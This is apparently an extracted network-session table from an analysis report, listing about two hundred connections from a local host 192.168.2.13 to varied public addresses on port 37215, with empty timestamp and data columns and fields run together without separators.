                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6849192.168.2.1343388197.212.233.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6850192.168.2.1343884197.97.52.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6851192.168.2.1352218157.237.30.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6852192.168.2.1338610197.89.24.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6853192.168.2.134304241.90.14.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6854192.168.2.1354128157.89.70.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6855192.168.2.1357918169.73.97.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6856192.168.2.135149441.164.9.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6857192.168.2.1334880196.128.167.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6858192.168.2.1360314157.85.90.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6859192.168.2.135687688.94.204.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6860192.168.2.1353032212.117.225.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6861192.168.2.1337382197.26.16.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6862192.168.2.133382096.194.100.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6863192.168.2.1345316157.136.217.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6864192.168.2.1347342157.194.178.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6865192.168.2.1360716157.193.105.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6866192.168.2.133852441.15.112.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6867192.168.2.135143427.184.70.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6868192.168.2.1347814157.164.66.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6869192.168.2.133346241.134.44.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6870192.168.2.136009241.25.129.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6871192.168.2.1356312102.124.207.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6872192.168.2.1354712157.166.12.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6873192.168.2.133794441.248.233.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6874192.168.2.1335280197.85.87.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6875192.168.2.1334654157.196.228.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6876192.168.2.134697441.127.145.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6877192.168.2.1336160157.104.242.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6878192.168.2.133512481.94.22.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6879192.168.2.133586092.199.54.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6880192.168.2.1345252157.10.174.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6881192.168.2.135233041.149.204.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6882192.168.2.1358372157.54.88.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6883192.168.2.1352484170.202.210.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6884192.168.2.1353650197.237.249.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6885192.168.2.1354996157.231.143.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6886192.168.2.1353134157.12.123.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6887192.168.2.136086041.80.17.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6888192.168.2.1342624197.100.242.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6889192.168.2.1350732197.35.188.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6890192.168.2.135079641.210.183.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6891192.168.2.135000641.143.34.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6892192.168.2.1337194157.216.19.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6893192.168.2.136017041.41.110.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6894192.168.2.135573445.164.74.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6895192.168.2.1341620197.189.36.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6896192.168.2.1336732157.146.113.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6897192.168.2.135502241.67.86.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6898192.168.2.1358190197.35.83.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6899192.168.2.1360624197.13.182.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6900192.168.2.1339530178.6.223.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6901192.168.2.135302860.165.250.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6902192.168.2.13352642.126.225.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6903192.168.2.1348986157.243.35.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6904192.168.2.133660841.219.13.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6905192.168.2.1341964157.184.222.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6906192.168.2.1348518197.209.244.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6907192.168.2.1332900197.102.198.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6908192.168.2.134144818.76.228.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6909192.168.2.1339466197.26.101.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6910192.168.2.134370841.100.100.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6911192.168.2.1339002197.140.18.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6912192.168.2.133662841.40.54.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6913192.168.2.133831441.47.23.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6914192.168.2.1345122197.14.149.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6915192.168.2.134403663.70.57.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6916192.168.2.1342796197.175.12.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6917192.168.2.1354730104.134.207.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6918192.168.2.1348180197.97.176.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6919192.168.2.134973641.24.45.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6920192.168.2.133827241.187.164.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6921192.168.2.1346292197.0.185.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6922192.168.2.135016059.23.218.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6923192.168.2.1344036191.32.1.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6924192.168.2.133417841.76.146.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6925192.168.2.1343528197.30.209.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6926192.168.2.1357632197.73.73.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6927192.168.2.1353138197.30.223.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6928192.168.2.133449641.157.237.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6929192.168.2.1355852157.162.82.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6930192.168.2.1342434197.119.214.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6931192.168.2.1360878197.130.45.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6932192.168.2.134297041.49.43.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6933192.168.2.134651241.116.22.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6934192.168.2.133370241.211.156.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6935192.168.2.1346626124.111.140.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6936192.168.2.135744841.238.89.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6937192.168.2.1346642197.202.127.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6938192.168.2.1333986105.231.26.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6939192.168.2.1351152197.106.143.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6940192.168.2.1357622197.200.1.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6941192.168.2.1355906157.156.68.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6942192.168.2.135245041.16.38.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6943192.168.2.1337542172.0.164.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6944192.168.2.133724836.59.255.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6945192.168.2.135840841.209.107.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6946192.168.2.1343366115.6.99.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6947192.168.2.1334460197.46.89.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6948192.168.2.1338566157.88.176.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6949192.168.2.1360002157.174.49.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6950192.168.2.134399246.54.248.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6951192.168.2.1351844157.229.181.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6952192.168.2.1353130157.87.168.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6953192.168.2.134741014.181.41.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6954192.168.2.135147697.237.169.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6955192.168.2.1359412157.26.252.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6956192.168.2.133754041.157.191.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6957192.168.2.1359322157.117.14.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6958192.168.2.1355604197.49.211.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6959192.168.2.1357570187.213.51.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6960192.168.2.133661441.205.240.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6961192.168.2.1335728157.108.51.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6962192.168.2.1333368157.89.118.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6963192.168.2.1333054157.106.0.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6964192.168.2.134497641.165.175.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6965192.168.2.1348808157.25.92.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6966192.168.2.1349964157.232.156.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6967192.168.2.1334868222.119.21.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6968192.168.2.1351826197.146.188.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6969192.168.2.1346190157.182.1.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6970192.168.2.135410841.223.21.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6971192.168.2.133607441.123.11.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6972192.168.2.1348082157.186.16.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6973192.168.2.1356364208.240.35.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6974192.168.2.1337530205.236.199.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6975192.168.2.1333518157.178.14.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6976192.168.2.135844241.112.77.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6977192.168.2.135798270.82.235.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6978192.168.2.134125664.37.131.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6979192.168.2.134852441.75.229.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6980192.168.2.134793841.165.57.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6981192.168.2.1357212157.165.64.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6982192.168.2.1333158157.167.91.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6983192.168.2.13338682.52.55.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6984192.168.2.135857241.212.56.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6985192.168.2.1332972143.92.24.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6986192.168.2.1344028194.184.215.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6987192.168.2.1342236197.98.193.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6988192.168.2.135740436.150.4.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6989192.168.2.1345640157.121.229.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6990192.168.2.1351282197.80.71.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6991192.168.2.1349538157.29.34.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6992192.168.2.1341566197.50.62.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6993192.168.2.1337554149.150.107.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6994192.168.2.1353260219.17.249.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6995192.168.2.134512841.86.2.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6996192.168.2.1336258173.186.50.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6997192.168.2.133454441.237.218.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6998192.168.2.1341588157.168.91.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6999192.168.2.1338650197.202.52.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7000192.168.2.1334388217.243.245.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7001192.168.2.134436841.78.251.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7002192.168.2.135314641.41.139.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7003192.168.2.1355050157.143.97.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7004192.168.2.1344606169.198.84.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7005192.168.2.1360156197.252.237.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7006192.168.2.134066071.74.251.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7007192.168.2.1333744157.62.73.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7008192.168.2.1356458197.90.14.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7009192.168.2.1350636112.59.189.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7010192.168.2.1360042197.195.111.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7011192.168.2.135663274.182.145.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7012192.168.2.1341220157.185.192.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7013192.168.2.1334038157.94.226.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7014192.168.2.135437641.149.211.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7015192.168.2.1341508197.156.127.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7016192.168.2.1341814222.136.183.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7017192.168.2.1356590197.137.54.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7018192.168.2.1342280157.181.132.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7019192.168.2.135724841.197.7.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7020192.168.2.133344638.210.190.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7021192.168.2.136015641.104.16.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7022192.168.2.1351706197.223.216.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7023192.168.2.1341336157.157.209.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7024192.168.2.1335238197.194.187.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7025192.168.2.135643641.35.14.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7026192.168.2.1335164159.108.166.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7027192.168.2.1333070153.135.138.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7028192.168.2.134374241.161.146.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7029192.168.2.1343228157.183.103.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7030192.168.2.135254632.252.187.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7031192.168.2.1337472197.212.238.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7032192.168.2.1360668197.52.160.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7033192.168.2.134100641.31.37.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7034192.168.2.1355140197.143.20.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7035192.168.2.1336404197.212.41.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7036192.168.2.134438441.119.59.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7037192.168.2.1342840157.171.64.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7038192.168.2.1334218197.51.242.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7039192.168.2.135624241.131.194.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7040192.168.2.133515641.172.244.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7041192.168.2.135198041.234.235.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7042192.168.2.133473449.31.254.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7043192.168.2.1358614157.0.209.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7044192.168.2.1345232157.113.52.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7045192.168.2.1360262209.203.230.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7046192.168.2.1348918197.218.232.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7047192.168.2.134941645.212.75.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7048192.168.2.135381241.187.242.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7049192.168.2.135938841.30.250.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7050192.168.2.1352616101.15.246.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7051192.168.2.1341172197.1.248.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7052192.168.2.1345220157.244.114.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7053192.168.2.1356774126.83.156.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7054192.168.2.134491441.168.165.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7055192.168.2.134794241.50.176.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7056192.168.2.133566841.8.121.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7057192.168.2.1346448157.247.146.18437215
                                                  TimestampBytes transferredDirectionData


